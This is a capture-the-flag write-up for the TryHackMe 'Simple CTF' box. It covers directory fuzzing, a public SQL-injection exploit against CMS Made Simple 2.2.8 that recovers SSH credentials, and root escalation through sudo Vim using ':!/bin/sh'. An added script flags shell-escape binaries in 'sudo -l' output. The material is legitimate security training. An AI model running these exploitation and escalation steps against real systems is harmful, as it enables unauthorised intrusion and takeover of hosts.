TryHackMe - Simple CTF (Easy)
FFUF finds a `/simple` directory on port 80 which hosts CMS Made Simple 2.2.8. This version is affected by an unauthenticated SQL injection for which a public exploit exists. The exploit recovers an SSH credential, and we can SSH in to get a user shell. In the privilege escalation phase, `sudo -l` shows that we are able to run Vim as root; a payload from GTFOBins turns that into a root shell.

- RHOST: 10.10.74.168
- LHOST: 10.13.12.2

(Screenshot: Nmap scan; HTTP is on port 80 and SSH on port 2222)
Run FFUF:
ffuf -u http://10.10.74.168/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -e .php,.html,.txt -fc 400,401,403
FFUF finds `/robots.txt` and `/simple`:

(Screenshot: FFUF output)
The version number is leaked on `/simple`:

(Screenshot: CMS Made Simple version 2.2.8)
Searchsploit for CMS Made Simple 2.2.8 returns a Python 2 unauthenticated SQL injection exploit, saved here as sqli.py:

(Screenshot: Searchsploit results)
Install termcolor, a dependency of the exploit script:
python2 -m pip install termcolor
Run the exploit. With `--crack` it cracks the password hash it recovers through the injection against the supplied wordlist:
$ ./sqli.py -u http://10.10.74.168/simple --crack -w /usr/share/wordlists/rockyou.txt
The exploit finds the credential `mitch:secret`:

(Screenshot: recovered credential)
SSH login as mitch (SSH listens on port 2222, not 22):
ssh mitch@10.10.74.168 -p 2222
Now we have a user shell:

(Screenshot: user shell)
Check which commands mitch may run with sudo:
sudo -l

(Screenshot: sudo -l output, Vim is runnable as root)
Use the payload from GTFOBins. Vim's `:!` executes a shell command, and since sudo runs Vim as root, the spawned `/bin/sh` is root too:
$ sudo vim -c ':!/bin/sh'
Now we have a root shell (confirm with `id`):

(Screenshot: root shell)
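The `sudo -l` step above was done by eye. As an added example (not code from the original writeup), the script below parses `sudo -l` output and flags every sudo-able binary that appears in a hand-picked subset of GTFOBins' sudo shell-escape entries. The `sudo -l` text is constructed to resemble this box (the real screenshot is not reproduced on the page), and the binary list is an assumed, deliberately short subset that you would extend from GTFOBins.

```shell
#!/bin/sh
# Added example: triage `sudo -l` output for known shell-escape binaries.
# Not part of the original writeup; sample data below is constructed.

# Assumed subset of GTFOBins "sudo" entries (extend from gtfobins.github.io).
GTFO_SHELL_ESCAPES="vim vi nano less more man awk find python python3 perl bash sh env"

# Constructed `sudo -l` output for mitch; mirrors the box (Vim as root) plus
# an extra entry so the parser has more than one line to handle.
SAMPLE_SUDO_L='Matching Defaults entries for mitch on Machine:
    env_reset, mail_badpass

User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/less'

# Constructed negative case: nothing here is in the escape list.
SAMPLE_SAFE='User bob may run the following commands on Machine:
    (root) /usr/bin/id'

# Print the command paths from the "may run the following commands" block,
# one per line, with the "(user) [NOPASSWD:]" prefix stripped.
sudo_commands() {
    printf '%s\n' "$1" | awk '
        /may run the following commands/ { inblock = 1; next }
        inblock && /^[[:space:]]*\(/ {
            sub(/^[[:space:]]*\([^)]*\)[[:space:]]*/, "")   # drop "(root) "
            sub(/^NOPASSWD:[[:space:]]*/, "")               # drop "NOPASSWD: "
            print
        }'
}

# For each sudo-able command whose binary basename is in the escape list,
# print "<basename> <full sudo entry>" on its own line. Prints nothing when
# no candidate is found.
gtfo_candidates() {
    sudo_commands "$1" | while IFS= read -r cmd; do
        first=${cmd%% *}          # binary is the first word; args may follow
        base=${first##*/}         # basename without forking
        for e in $GTFO_SHELL_ESCAPES; do
            if [ "$base" = "$e" ]; then
                printf '%s %s\n' "$base" "$cmd"
            fi
        done
    done
}

# Usage: on a live box replace the sample with: gtfo_candidates "$(sudo -l)"
gtfo_candidates "$SAMPLE_SUDO_L"
```

Each line of output is a binary to look up on GTFOBins; `vim /usr/bin/vim` is exactly the entry that gives the `sudo vim -c ':!/bin/sh'` escape used above. An entry of `(ALL) NOPASSWD: ALL` parses to the command `ALL`, which the list does not match, so treat an empty result as "nothing obvious", not as "no path to root".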